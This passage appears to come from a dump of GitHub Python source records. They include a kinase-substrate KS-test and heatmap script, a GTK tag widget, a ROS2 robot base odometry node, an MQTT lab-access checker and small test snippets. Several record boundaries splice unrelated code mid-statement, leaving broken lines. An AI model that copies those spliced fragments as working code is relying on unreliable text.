\"\":\n continue\n else: \n if \"\" not in line:\n array.append(line)\n\n nonsub_dic={}\n kinase_dic={}\n dic={}\n pval_map=[]\n heatmap_array=[]\n kolsmir_info=[]\n ks_links=[]\n ks_info=[]\n kolsmir_col=[\"Kinase\", \"Sub.Count\"]\n ks_col=[\"Kinase\", \"Site\", \"Site.Seq(+/- 7AA)\", \"Source\"]\n heatmap_col=[\"Kinase\"]\n # Columns 1 and onwards represent samples (e.g. cell lines).\n # For the current column (sample) a set of operations is performed. \n for col in range(1, col_length):\n # Reset the values in each dictionary for a new column.\n for key in dic:\n dic[key] = []\n for kin in kinase_dic:\n kinase_dic[kin] = []\n # Column names for relevant dataframes are created here dynamically.\n # curr_col is current sample/column name.\n curr_col=header[col]\n kolsmir_col.append(\"mnlog2(FC).\" + curr_col)\n kolsmir_col.append(\"(+/-)KS.\" + curr_col)\n kolsmir_col.append(\"pVal.\" + curr_col)\n kolsmir_col.append(\"(+/-)-log10(pVal).\" + curr_col)\n ks_col.append(\"log2(FC).\" + curr_col)\n heatmap_col.append(curr_col)\n\n data=[]\n # Multiple phosphosites separated by a colon are split here.\n # This ensures each phosphosite substrate and the log2(FC) value starts with a new line.\n # This is ran for each sample in turn. \n for n in range (0, len(array)):\n site=array[n][0].upper()\n fc=array[n][col]\n site=site.split(\";\")\n for s in site:\n if s == '':\n continue\n else:\n data.append([s, float(fc)])\n\n # Mapping of phosphosite substrate keys to their (often multiple) log2(FCs) is achieved here.\n for entry in data:\n site=entry[0]\n fc=entry[1]\n if site not in dic:\n dic[site]=[fc]\n else:\n dic[site].append(fc)\n\n # If the same phosphosite has been detected more than once, its mean log2(FC) is calculated.\n # Final dictionary contains unique phosphosites and individual log2(FC) values, averaged where appropriate.\n for key in dic:\n length=len(dic[key])\n mean_fc=sum(dic[key])/length\n dic[key] = float(mean_fc)\n\n # Each phosphosite in the dictionary is scanned against the K-S db. \n # If a match is found, relevant information for that phosphosite is retained.\n # Scanning is only done for the first column.\n if col == 1:\n for x in dic:\n for y in ks_db:\n if x == y[0]:\n # ks_links will be used to assign the current sample's log2(FCs) to each kinase later on.\n ks_links.append([y[1], y[0], y[2], y[3], dic[x]])\n # ks_info will contain kinase-substrate relationship info for each sample.\n ks_info.append([y[1], y[0], y[2], y[3], dic[x]])\n # Once the first column is passed, new log2(FCs) are removed and/or appended to the original arrays for each sample.\n elif col > 1:\n for s in ks_links:\n s.remove(s[-1])\n s.append(dic[s[1]])\n for k in ks_info:\n k.append(dic[k[1]])\n\n # List converted into a dataframe for further data manipulation. \n ks_links_df = pd.DataFrame(ks_links, columns = [\"Kinase\", \"Site\", \"Site.Seq(+/- 7AA)\", \"Source\", \"log2(FC)\"])\n\n # A dictionary containing unique kinases and substrate log2(FCs) is created.\n # If the same kinase was identified for multiple substrates, multiple log2(FCs) are appended to the dictionary values.\n for match in ks_links:\n kinase=match[0]\n log2fc=match[4]\n if kinase not in kinase_dic:\n kinase_dic[kinase]=[log2fc]\n else:\n kinase_dic[kinase].append(log2fc)\n\n # The dictionary is used to calculate the number of substrates identified for each unique kinase.\n # It also calculates the mean log2(FC) across each kinase's substrates.\n # The algorithm computes the (+/-)KS statistic, p-value and -log10(p-value) using substrate and non-substrate log2(FC) values.\n index=-1\n condition=-1\n for kinase in kinase_dic:\n index+=1\n nonsub_fc=[]\n sub_num=len(kinase_dic[kinase])\n kin_fc_mean=sum(kinase_dic[kinase]) / float(sub_num)\n if col == 1:\n # Substrate names for a given kinase are extracted into a flat list.\n # These will be used to identify all non-substrates conditionally.\n sub_df = ks_links_df.loc[ks_links_df['Kinase'] == kinase]\n sub_names = sub_df['Site'].tolist()\n # Non-substrates are located within the ks_links dataframe.\n # For faster performance, these are assigned to a new dictionary to be re-used for columns 2 onwards.\n non_sub_df=ks_links_df.loc[~ks_links_df['Site'].isin(sub_names)]\n non_sub_df=non_sub_df.drop_duplicates(subset='Site')\n nonsub_names = non_sub_df['Site'].tolist()\n nonsub_dic[kinase] = nonsub_names\n # Substrate and non-substrate log2(FC) values.\n sub_fc = kinase_dic[kinase]\n non_sub_fc = non_sub_df['log2(FC)'].tolist()\n #KS-test statistic and p-value for each kinase are calculated here.\n ks_stat, pval, log_pval = ksTest(sub_fc, non_sub_fc)\n # -log10(p-val) and KS is signed based on the mean log2(FC) of the kinase.\n if kin_fc_mean < 0:\n log_pval = -log_pval\n ks_stat = -ks_stat\n # Kolmogorov-Smirnov stats are appended to a new list here.\n kolsmir_info.append([kinase, sub_num, kin_fc_mean, ks_stat, pval, log_pval])\n\n elif col > 1:\n # Non-substrate log2(FCs) are identified for each kinase.\n sub_fc = kinase_dic[kinase]\n non_subs = nonsub_dic[kinase]\n for n in non_subs:\n nonsub_fc.append(dic[n])\n # KS-test function applied here.\n ks_stat, pval, log_pval = ksTest(sub_fc, nonsub_fc)\n # -log10(p-val) and KS is signed based on the mean log2(FC) of the kinase.\n if kin_fc_mean < 0:\n log_pval = -log_pval\n ks_stat = -ks_stat\n # If the program has gone past the first column, each statistic is appended in a repeating manner to the original array.\n kolsmir_info[index].append(kin_fc_mean)\n kolsmir_info[index].append(ks_stat)\n kolsmir_info[index].append(pval)\n kolsmir_info[index].append(log_pval)\n\n if sub_num >= min_sub:\n condition+=1\n if col == 1:\n # Array used for heatmap generation. \n heatmap_array.append([kinase, log_pval])\n # An array of p-values for each kinase across all samples. Used for heatmap annotation.\n pval_map.append([pval])\n elif col > 1:\n heatmap_array[condition].append(log_pval)\n pval_map[condition].append(pval)\n\n # p-values for the heatmap annotation are extracted from a nested list into a flat list.\n pvalues=[]\n for entry in pval_map:\n for pval in entry:\n pvalues.append(pval)\n\n # Statistic and KS-links dataframes are generated.\n kolsmir_df = pd.DataFrame(kolsmir_info, columns=kolsmir_col)\n ksinfo_df = pd.DataFrame(ks_info, columns=ks_col)\n # Heatmap df for the heatmap generation.\n heatmap_df = pd.DataFrame(heatmap_array, columns=heatmap_col)\n heatmap_df=heatmap_df.set_index(\"Kinase\")\n\n # Heatmap only generated if the user chose to produce graphics during file upload.\n if graphics == \"no\":\n svg_fig = \"Heatmap was not generated for this analysis.\"\n elif graphics == \"yes\":\n # Set the margins and bar height for a single category.\n topmargin = 0.1 #inches\n bottommargin = 0.1 #inches\n categorysize = 0.35 # inches\n # Number of kinases identified.\n n=len(heatmap_array)\n\n leftmargin = 0.1\n rightmargin = 0.1\n catsize = 0.5\n # Number of conditions (e.g. cell lines).\n m=len(heatmap_col)-1\n\n # Parameters for color bar.\n aspect = n\n pad_fraction = 0.7\n\n # Calculate a dynamic figure height based on the known values above.\n figheight = topmargin + bottommargin + (n+1)*categorysize\n\n # Calculate a dynamic figure width based on the known values above.\n figwidth = leftmargin + rightmargin + (m+1)*catsize\n\n fig, ax = plt.subplots(figsize=(figwidth, figheight))\n\n # Format the axes.\n ax.xaxis.set_ticks_position('top')\n plt.yticks(fontsize=6)\n plt.xticks(fontsize=6)\n\n # Plot the heatmap.\n ax = sns.heatmap(heatmap_df, cmap='coolwarm', annot=True, fmt=\".1f\", annot_kws={'size':5}, cbar=False, linewidths=0.3, linecolor='white')\n\n # Format the colour bar dynamically.\n ax_div = make_axes_locatable(ax)\n width = axes_size.AxesY(ax, aspect=1./aspect)\n pad = axes_size.Fraction(pad_fraction, width)\n cax = ax_div.append_axes('right', size = width, pad = pad)\n cb=plt.colorbar(ax.get_children()[0], cax = cax, orientation = 'vertical')\n cax.yaxis.set_ticks_position('right')\n cb.ax.tick_params(labelsize=6)\n cb.set_label('(+/-) -log10(p-value)', fontsize=6, labelpad=7)\n cb.outline.set_visible(False)\n\n #Remove y axis label.\n ax.yaxis.set_label_text(\"\")\n\n # Rotate the axis labels.\n for item in ax.get_yticklabels():\n item.set_rotation(0)\n\n for item in ax.get_xticklabels():\n item.set_rotation(90)\n\n # Annotate statistically significant scores with asterisks.\n # * for p < 0.05 and ** for p < 0.01.\n counter=-1\n for text in ax.texts:\n counter+=1\n if pvalues[counter] < 0.05 and pvalues[counter] >= 0.01:\n text.set_weight('bold')\n text.set_text(text.get_text() + \"*\")\n elif pvalues[counter] < 0.01:\n text.set_weight('bold')\n text.set_text(text.get_text() + \"**\")\n\n # Create a StringIO object and use it to write SVG figure data to string buffer.\n fig_file = StringIO()\n fig.savefig(fig_file, format='svg', bbox_inches=\"tight\")\n # Seek beginning of the figure file.\n fig_file.seek(0)\n # Retrieve figure contents as a string.\n svg_fig = ' 0.5 else 0 for prob in np.ravel(predictions)\n]\n\nprint(f'Accuracy on test set: {accuracy_score(Y_test, prediction_classes):.2f}')\n\n#save results\nnp.savetxt('results.csv', prediction_classes, delimiter=',')\nmodel.save(\"my_model\")\n\n\n\n\n","repo_name":"akselhm/IntelligentSystems2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14044376290","text":"from gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GObject\nfrom gi.repository import PangoCairo\n\n#-------------------------------------------------------------------------\n#\n# SegmentMap class\n#\n#-------------------------------------------------------------------------\n\nclass TagList(Gtk.DrawingArea):\n \"\"\"\n A graphical list of tags.\n \"\"\"\n\n __gsignals__ = {'clicked': (GObject.SignalFlags.RUN_FIRST, None, (int,))}\n\n def __init__(self, tag_list=None):\n Gtk.DrawingArea.__init__(self)\n\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK |\n Gdk.EventMask.BUTTON_PRESS_MASK |\n Gdk.EventMask.BUTTON_RELEASE_MASK)\n self.connect('motion-notify-event', self.on_pointer_motion)\n self.connect('button-press-event', self.on_button_press)\n\n self.__active = -1\n self.__rects = []\n if tag_list is None:\n self.tag_list = []\n else:\n self.tag_list = tag_list\n\n def set_tags(self, tag_list):\n \"\"\"\n Set the tags to display.\n @param tag_list: A list of (tag name, color) tuples.\n @type tag_list: list\n \"\"\"\n self.tag_list = tag_list\n\n def do_draw(self, cr):\n \"\"\"\n A custom draw method for this widget.\n @param cr: A cairo context.\n @type cr: cairo.Context\n \"\"\"\n if (len(self.tag_list)) == 0:\n return\n\n allocation = self.get_allocation()\n context = self.get_style_context()\n fg_color = context.get_color(context.get_state())\n\n padding = 2\n size = 10\n\n cr.set_line_width(1)\n self.__rects = []\n for i, tag in enumerate(self.tag_list):\n\n cr.rectangle(i * (padding + size),\n padding,\n size,\n size)\n self.__rects.append((i * (padding + size),\n padding,\n size,\n size))\n\n color = Gdk.RGBA()\n color.parse(tag[1])\n cr.set_source_rgba(color.red, color.green, color.blue, 1)\n cr.fill()\n\n self.set_size_request((size + padding) * (i + 1) + padding, -1)\n\n def on_pointer_motion(self, _dummy, event):\n \"\"\"\n Called when the pointer is moved.\n @param _dummy: This widget. Unused.\n @type _dummy: Gtk.Widget\n @param event: An event.\n @type event: Gdk.Event\n \"\"\"\n if self.__rects is None:\n return False\n active = -1\n for i, rect in enumerate(self.__rects):\n if (event.x > rect[0] and event.x < rect[0] + rect[2] and\n event.y > rect[1] and event.y < rect[1] + rect[3]):\n active = i\n if self.__active != active:\n self.__active = active\n if active == -1:\n self.set_tooltip_text('')\n else:\n self.set_tooltip_text(self.tag_list[active][0])\n\n return False\n\n def on_button_press(self, _dummy, event):\n \"\"\"\n Called when a mouse button is clicked.\n @param _dummy: This widget. Unused.\n @type _dummy: Gtk.Widget\n @param event: An event.\n @type event: Gdk.Event\n \"\"\"\n if (event.button == 1 and\n event.type == Gdk.EventType.DOUBLE_BUTTON_PRESS and\n self.__active != -1):\n self.emit('clicked', self.__active)\n","repo_name":"gramps-project/addons-source","sub_path":"CombinedView/taglist.py","file_name":"taglist.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"76"} +{"seq_id":"44870347833","text":"#!/usr/bin/env python\n\nfrom functools import partial\nfrom math import pi as pi\nimport sys\nimport threading\nimport traceback\n\nfrom geometry_msgs.msg import Twist, TransformStamped\nfrom nav_msgs.msg import Odometry\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.time import Time\n\nfrom rcl_interfaces.msg import ParameterDescriptor\nimport tf2_ros\n\nfrom roboclaw_interfaces.msg import SpeedCommand, Stats\n\nfrom r2b2_base.base_functions import (\n calc_create_speed_cmd, calc_base_frame_velocity_from_encoder_diffs,\n calc_odometry_from_base_velocity\n)\nfrom r2b2_base.odometry_helpers import (\n yaw_from_odom_message\n)\n\n\nclass DEFAULTS:\n\n NODE_NAME = \"base_node\"\n\n # Subscribes\n CMD_VEL_TOPIC = \"cmd_vel\"\n ROBOCLAW_FRONT_STATS_TOPIC = \"roboclaw_front/stats\"\n ROBOCLAW_REAR_STATS_TOPIC = \"roboclaw_rear/stats\"\n\n # Publishes\n SPEED_CMD_TOPIC = \"roboclaw/speed_command\"\n ODOM_TOPIC = \"odom\"\n\n # Default Parameters\n LOOP_HZ = 20 # hertz\n WHEEL_DIST = 0.180 # meters\n WHEEL_RADIUS = 0.0325 # meters\n WHEEL_SLIP_FACTOR = 0.5 # Decimal % of angular motion lost to slip\n TICKS_PER_ROTATION = 48 * 34\n MAX_QPPS = 3700\n MAX_ACCEL = 20000\n MAX_X_LINEAR_VEL = 0.5 # meters/sec\n MAX_Z_ANGULAR_VEL = pi / 2 # radians/sec\n MAX_DRIVE_SECS = 1\n ODOM_FRAME_ID = \"odom\"\n PUBLISH_ODOM_TF = True\n BASE_FRAME_ID = \"base_link\"\n DEADMAN_SECS = 1\n LOG_LEVEL = \"info\"\n\n\nclass PARAMS:\n LOG_LEVEL = 'log_level'\n WHEEL_DIST = 'wheel_dist'\n WHEEL_RADIUS = 'wheel_radius'\n WHEEL_SLIP_FACTOR = 'wheel_slip_factor'\n TICKS_PER_ROTATION = 'ticks_per_rotation'\n MAX_DRIVE_SECS = 'max_drive_secs'\n DEADMAN_SECS = 'deadman_secs'\n MAX_QPPS = 'max_qpps'\n MAX_X_LIN_VEL = 'max_x_lin_vel'\n MAX_Z_ANG_VEL = 'max_z_ang_vel'\n MAX_ACCEL = 'max_accel'\n BASE_FRAME_ID = 'base_frame_id'\n WORLD_FRAME_ID = 'odom_frame_id'\n LOOP_HZ = 'loop_hz'\n PUBLISH_ODOM_TF = 'publish_odom_tf'\n SPEED_CMD_TOPIC = 'speed_command_topic'\n ODOM_TOPIC = 'odom_topic'\n CMD_VEL_TOPIC = 'cmd_vel_topic'\n ROBOCLAW_FRONT_STATS_TOPIC = 'roboclaw_front_stats_topic'\n ROBOCLAW_REAR_STATS_TOPIC = 'roboclaw_rear_stats_topic'\n\n\nclass BaseNode(Node):\n\n def __init__(self):\n super().__init__(DEFAULTS.NODE_NAME)\n\n self.declare_parameters(\n namespace='',\n parameters=[\n (PARAMS.LOG_LEVEL, DEFAULTS.LOG_LEVEL, ParameterDescriptor(description='Log verbosity, defaults to `info`')),\n (PARAMS.WHEEL_DIST, DEFAULTS.WHEEL_DIST, ParameterDescriptor(description='Width between the wheels in meters')),\n (PARAMS.WHEEL_RADIUS, DEFAULTS.WHEEL_RADIUS, ParameterDescriptor(description='Radius of the wheels in meters')),\n (PARAMS.WHEEL_SLIP_FACTOR, DEFAULTS.WHEEL_SLIP_FACTOR, ParameterDescriptor(description='Factor to compensate for wheel slip as a float >=0.0 <1.0')),\n (PARAMS.TICKS_PER_ROTATION, DEFAULTS.TICKS_PER_ROTATION, ParameterDescriptor(description='Wheel encoder ticks per rotation')),\n (PARAMS.MAX_DRIVE_SECS, DEFAULTS.MAX_DRIVE_SECS, ParameterDescriptor(description='Maximum seconds drive should run before stopping')),\n (PARAMS.DEADMAN_SECS, DEFAULTS.DEADMAN_SECS, ParameterDescriptor(description='Max time tolerated between cmd_vel messages before stopping')),\n (PARAMS.MAX_QPPS, DEFAULTS.MAX_QPPS, ParameterDescriptor(description='Max wheel rotation speed in QPPS')),\n (PARAMS.MAX_X_LIN_VEL, DEFAULTS.MAX_X_LINEAR_VEL, ParameterDescriptor(description='Max linear velocity in m/s')),\n (PARAMS.MAX_Z_ANG_VEL, DEFAULTS.MAX_Z_ANGULAR_VEL, ParameterDescriptor(description='Max angular velocity in rad/s')),\n (PARAMS.MAX_ACCEL, DEFAULTS.MAX_ACCEL, ParameterDescriptor(description='Max QPPS/sec of acceleration')),\n (PARAMS.BASE_FRAME_ID, DEFAULTS.BASE_FRAME_ID, ParameterDescriptor(description='Frame ID of the base')),\n (PARAMS.WORLD_FRAME_ID, DEFAULTS.ODOM_FRAME_ID, ParameterDescriptor(description='Frame ID of the world (e.g. `odom`')),\n (PARAMS.LOOP_HZ, DEFAULTS.LOOP_HZ, ParameterDescriptor(description='Frequency of the main logic loop')),\n (PARAMS.PUBLISH_ODOM_TF, DEFAULTS.PUBLISH_ODOM_TF, ParameterDescriptor(description='If true, publish the odom TF transform')),\n (PARAMS.SPEED_CMD_TOPIC, DEFAULTS.SPEED_CMD_TOPIC, ParameterDescriptor(description='Topic to publish for SpeedCommand messages to the Roboclaws')),\n (PARAMS.CMD_VEL_TOPIC, DEFAULTS.CMD_VEL_TOPIC, ParameterDescriptor(description='Topic to listen for Twist messages')),\n (PARAMS.ODOM_TOPIC, DEFAULTS.ODOM_TOPIC, ParameterDescriptor(description='Topic to publish for Odometry messages')),\n (PARAMS.ROBOCLAW_FRONT_STATS_TOPIC, DEFAULTS.ROBOCLAW_FRONT_STATS_TOPIC, ParameterDescriptor(description='Stats topic for front Roboclaw')),\n (PARAMS.ROBOCLAW_REAR_STATS_TOPIC, DEFAULTS.ROBOCLAW_REAR_STATS_TOPIC, ParameterDescriptor(description='Stats topic for rear Roboclaw'))\n ]\n )\n\n self._wheel_dist = self.get_parameter(PARAMS.WHEEL_DIST).value\n self._wheel_radius = self.get_parameter(PARAMS.WHEEL_RADIUS).value\n self._wheel_slip_factor = self.get_parameter(PARAMS.WHEEL_SLIP_FACTOR).value\n self._ticks_per_rotation = self.get_parameter(PARAMS.TICKS_PER_ROTATION).value\n self._max_drive_secs = self.get_parameter(PARAMS.MAX_DRIVE_SECS).value\n self._deadman_secs = self.get_parameter(PARAMS.DEADMAN_SECS).value\n self._max_qpps = self.get_parameter(PARAMS.MAX_QPPS).value\n self._max_x_lin_vel = self.get_parameter(PARAMS.MAX_X_LIN_VEL).value\n self._max_z_ang_vel = self.get_parameter(PARAMS.MAX_Z_ANG_VEL).value\n self._max_accel = self.get_parameter(PARAMS.MAX_ACCEL).value\n self._base_frame_id = self.get_parameter(PARAMS.BASE_FRAME_ID).value\n self._world_frame_id = self.get_parameter(PARAMS.WORLD_FRAME_ID).value\n self._publish_odom_tf = self.get_parameter(PARAMS.PUBLISH_ODOM_TF).value\n\n # Publishes\n self._speed_cmd_pub = self.create_publisher(\n msg_type=SpeedCommand,\n topic=self.get_parameter(PARAMS.SPEED_CMD_TOPIC).value,\n qos_profile=1\n )\n self._odom_pub = self.create_publisher(\n msg_type=Odometry,\n topic=self.get_parameter(PARAMS.ODOM_TOPIC).value,\n qos_profile=1\n )\n\n self._tf_broadcaster: tf2_ros.TransformBroadcaster = None\n if self._publish_odom_tf:\n self._tf_broadcaster = tf2_ros.TransformBroadcaster(self, qos=1)\n\n # Twist message Subscriber\n self.create_subscription(\n msg_type=Twist,\n topic=self.get_parameter(PARAMS.CMD_VEL_TOPIC).value,\n callback=self._cmd_vel_callback,\n qos_profile=1\n )\n\n # Roboclaw Stats message Subscriber\n self.create_subscription(\n msg_type=Stats,\n topic=self.get_parameter(PARAMS.ROBOCLAW_FRONT_STATS_TOPIC).value,\n callback=partial(self._roboclaw_stats_callback, 'front'),\n qos_profile=1\n )\n\n self.create_subscription(\n msg_type=Stats,\n topic=self.get_parameter(PARAMS.ROBOCLAW_REAR_STATS_TOPIC).value,\n callback=partial(self._roboclaw_stats_callback, 'rear'),\n qos_profile=1\n )\n\n # Main loop timer\n loop_secs = 1.0 / self.get_parameter(PARAMS.LOOP_HZ).value\n self.create_timer(loop_secs, self._base_loop_callback)\n\n # Init Twist command state\n self._x_linear_cmd = 0.0\n self._z_angular_cmd = 0.0\n\n # Last time we received a Twist message\n # If we don't get a message after deadman_secs, we stop the base\n self._last_cmd_vel_time: Time = self.get_clock().now()\n\n # Init Odometry state\n self._world_x = 0.0\n self._world_y = 0.0\n self._world_theta = 0.0\n self._last_odom_time: Time = None\n\n # Init Roboclaw stats state\n self._roboclaw_front_stats = None # type: Stats\n # self._roboclaw_rear_stats = None # type: Stats\n\n # Roboclaw encoder state\n self._m1_front_enc_prev = 0\n self._m2_front_enc_prev = 0\n # self._m1_rear_enc_prev = 0\n # self._m2_rear_enc_prev = 0\n\n self._stats_lock = threading.RLock() # To serialize access to the qpps stats\n self._cmd_vel_lock = threading.RLock() # To serialize access to x/z command variables\n\n # Set initial states\n if self._roboclaw_front_stats is not None:\n self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val\n self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val\n # if self._roboclaw_rear_stats is not None:\n # self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val\n # self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val\n self._last_odom_time: Time = self.get_clock().now()\n self._last_cmd_vel_time: Time = self.get_clock().now()\n\n def _cmd_vel_callback(self, msg: Twist):\n \"\"\"Called by the Twist cmd_vel message subscriber.\n\n Parameters:\n msg (Twist): Twist command velocity message\n \"\"\"\n with self._cmd_vel_lock:\n self._x_linear_cmd = msg.linear.x\n self._z_angular_cmd = msg.angular.z\n self._last_cmd_vel_time = self.get_clock().now()\n self.get_logger().debug(f\"CMD Vel - X: {msg.linear.x} | Z: {msg.angular.z}\")\n\n def _roboclaw_stats_callback(self, position: str, stats: Stats):\n \"\"\"Called by the Roboclaw Stats message subscriber\n\n Parameters:\n stats (Stats): Roboclaw Stats message\n callback_args (List): Arguments to this function (i.e. \"front\" or \"rear)\n \"\"\"\n with self._stats_lock:\n if \"front\" in position:\n self._roboclaw_front_stats = stats\n elif \"rear\" in position:\n self._roboclaw_rear_stats = stats\n else:\n self.get_logger().warn(\"roboclaw_stats_callback: Unsure which stats to read\")\n self.get_logger().warn(f\"callback_args: {position}\")\n self.get_logger().debug(\n f\"Stats received: t=({stats.header.stamp.sec}.{stats.header.stamp.nanosec}), frame_id=({stats.header.frame_id}), \"\n f\"m1_enc_val=({stats.m1_enc_val}), m2_enc_val=({stats.m2_enc_val}), \"\n f\"m1_enc_qpps=({stats.m1_enc_qpps}), m2_enc_qpps=({stats.m2_enc_qpps})\"\n )\n\n def _base_loop_callback(self):\n # ------------------------------------------------------------\n # If the last command was over deadman_secs ago, stop the base\n # ------------------------------------------------------------\n if (\n self._last_cmd_vel_time is None or\n (self.get_clock().now() - self._last_cmd_vel_time).nanoseconds / 1e9 > self._deadman_secs\n ):\n self._x_linear_cmd = 0.0\n self._z_angular_cmd = 0.0\n\n # ---------------------------------\n # Calculate and send motor commands\n # ---------------------------------\n with self._cmd_vel_lock:\n x_linear_cmd = self._x_linear_cmd\n z_angular_cmd = self._z_angular_cmd\n\n # Clamp the velocities to the max configured for the base\n x_linear_cmd = max(-self._max_x_lin_vel, min(x_linear_cmd, self._max_x_lin_vel))\n z_angular_cmd = max(-self._max_z_ang_vel, min(z_angular_cmd, self._max_z_ang_vel))\n\n cmd = calc_create_speed_cmd(\n x_linear_cmd, z_angular_cmd,\n self._wheel_dist, self._wheel_radius, self._wheel_slip_factor,\n self._ticks_per_rotation, self._max_drive_secs, self._max_qpps, self._max_accel\n )\n self.get_logger().debug(f\"Publishing: {cmd}\")\n self._speed_cmd_pub.publish(cmd)\n\n # -------------------------------\n # Calculate and publish Odometry\n # -------------------------------\n\n if self._roboclaw_front_stats is None:\n self.get_logger().info(\"Insufficient roboclaw stats received, skipping odometry calculation\")\n return\n\n with self._stats_lock:\n # Calculate change in encoder readings\n m1_front_enc_diff = self._roboclaw_front_stats.m1_enc_val - self._m1_front_enc_prev\n m2_front_enc_diff = self._roboclaw_front_stats.m2_enc_val - self._m2_front_enc_prev\n # m1_rear_enc_diff = self._roboclaw_rear_stats.m1_enc_val - self._m1_rear_enc_prev\n # m2_rear_enc_diff = self._roboclaw_rear_stats.m2_enc_val - self._m2_rear_enc_prev\n\n self._m1_front_enc_prev = self._roboclaw_front_stats.m1_enc_val\n self._m2_front_enc_prev = self._roboclaw_front_stats.m2_enc_val\n # self._m1_rear_enc_prev = self._roboclaw_rear_stats.m1_enc_val\n # self._m2_rear_enc_prev = self._roboclaw_rear_stats.m2_enc_val\n\n # Since we have a two Roboclaw robot, take the average of the encoder diffs\n # from each Roboclaw for each side.\n # m1_enc_diff = (m1_front_enc_diff + m1_rear_enc_diff) / 2\n # m2_enc_diff = (m2_front_enc_diff + m2_rear_enc_diff) / 2\n m1_enc_diff = m1_front_enc_diff\n m2_enc_diff = m2_front_enc_diff\n\n # We take the nowtime from the Stats message so it matches the encoder values.\n # Otherwise we would get timing variances based on when the loop runs compared to\n # when the stats were measured.\n # Since we have a two Roboclaw robot, take the latest stats timestamp from either\n # Roboclaw.\n front_stamp = self._roboclaw_front_stats.header.stamp\n # rear_stamp = self._roboclaw_rear_stats.header.stamp\n nowtime = rclpy.time.Time.from_msg(front_stamp)\n\n x_linear_v, y_linear_v, z_angular_v = calc_base_frame_velocity_from_encoder_diffs(\n m1_enc_diff, m2_enc_diff, self._ticks_per_rotation,\n self._wheel_radius, self._wheel_dist, self._wheel_slip_factor,\n self._last_odom_time, nowtime\n )\n\n# ----------\n # self.get_logger().info(f\"BASENODE pos x: {self._world_x}, y: {self._world_y}, th: {self._world_theta}\")\n # self.get_logger().info(f\"BASENODE v's x_lin: {x_linear_v}, y_lin: {y_linear_v}, z_ang: {z_angular_v}\")\n# ----------\n\n time_delta_secs = (nowtime - self._last_odom_time).nanoseconds / 1e9\n self._last_odom_time = nowtime\n\n odom = calc_odometry_from_base_velocity(\n x_linear_v, y_linear_v, z_angular_v,\n self._world_x, self._world_y, self._world_theta,\n time_delta_secs, nowtime,\n self._base_frame_id, self._world_frame_id\n )\n\n# ----------\n # self.get_logger().info(f\"{odom.pose.pose.orientation}\")\n# ----------\n\n self._odom_pub.publish(odom)\n\n # Update world pose\n self._world_x = odom.pose.pose.position.x\n self._world_y = odom.pose.pose.position.y\n self._world_theta = yaw_from_odom_message(odom)\n\n # -----------------------------------------\n # Calculate and broacast tf transformation\n # -----------------------------------------\n if self._publish_odom_tf:\n quat = odom.pose.pose.orientation\n# ----------\n # self.get_logger().info(f\"quat: {quat}\")\n# ----------\n t = TransformStamped()\n t.header.stamp = nowtime.to_msg()\n t.header.frame_id = self._world_frame_id\n t.child_frame_id = self._base_frame_id\n t.transform.translation.x = self._world_x\n t.transform.translation.y = self._world_y\n t.transform.translation.z = 0.0\n t.transform.rotation.x = quat.x\n t.transform.rotation.y = quat.y\n t.transform.rotation.z = quat.z\n t.transform.rotation.w = quat.w\n self._tf_broadcaster.sendTransform(t)\n\n self._last_odom_time = nowtime\n\n self.get_logger().debug(\n \"World position: [{}, {}] heading: {}, forward speed: {}, turn speed: {}\".format(\n self._world_x, self._world_y, self._world_theta,\n self._x_linear_cmd, self._z_angular_cmd\n )\n )\n\n\ndef main(args=None):\n\n # Setup the ROS node\n rclpy.init(args=args)\n node = BaseNode()\n\n try:\n rclpy.spin(node)\n except KeyboardInterrupt:\n pass\n except Exception:\n node.get_logger().fatal(\"Unhandled exeption...printing stack trace then shutting down node\")\n node.get_logger().fatal(traceback.format_exc())\n\n # Shutdown and cleanup\n rclpy.shutdown()\n\n\nif __name__ == \"__main__\":\n main(args=sys.argv)\n","repo_name":"sheaffej/r2b2-base","sub_path":"r2b2_base/base_node.py","file_name":"base_node.py","file_ext":"py","file_size_in_byte":16905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26553460021","text":"class Node:\n def __init__(self, data):\n self.left = None\n self.right = None\n self.data = data\n self.temp = 0 \n \ndef swap_node(root):\n if root:\n swap_node(root.left)\n if prev!=None and root.data fecha_salida:\n print(f\"Salio:{fecha}\")\n return False\n if fecha > fecha_salida:\n print(f\"Entro:{fecha}\")\n return True\n except TypeError:\n print(\"Comparacion no permitida.\")\n print(f\"Salio:{fecha}\")\n return False\nprint(separador)\nprint(\"ACCESO\")\nprint(separador)\ntry:\n client = mqtt.Client(cliente)\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(broker_ip, port, 60)\n print(\"Acerca la tarjeta al lector.\")\n print(f\"Conectando a {broker_ip}:{port}\")\n client.loop_forever()\nexcept Exception as err:\n print(err)\n print(f\"No es posible conectarse al Broker {broker_ip}:{port}\")\n print(\"Revisa tu conexión\")\nexcept KeyboardInterrupt:\n print(\"\\n\")\n print(\"Finalizando programa.\")","repo_name":"ElierRosales/Capstone-project-Administrador-de-laboratorios","sub_path":"MongoDB/buscarUID.py","file_name":"buscarUID.py","file_ext":"py","file_size_in_byte":6497,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"221025738","text":"import ipdb\nipdb.set_trace()\nipdb.set_trace(context=5) # 이곳에서 프로그램을 중단.\n # 이하 5줄을 보여준다. \nipdb.pm() #debug\nipdb.run('x[0] = 3')\nresult = ipdb.runcall(function, arg0, arg1, kwarg='foo')\nresult = ipdb.runeval('f(1,2) - 3')\n\nprint(result)\n\n","repo_name":"iamnamki/python-TIL","sub_path":"ipdbTest.py","file_name":"ipdbTest.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23873587871","text":"import json\nimport os\nfrom os.path import isfile, 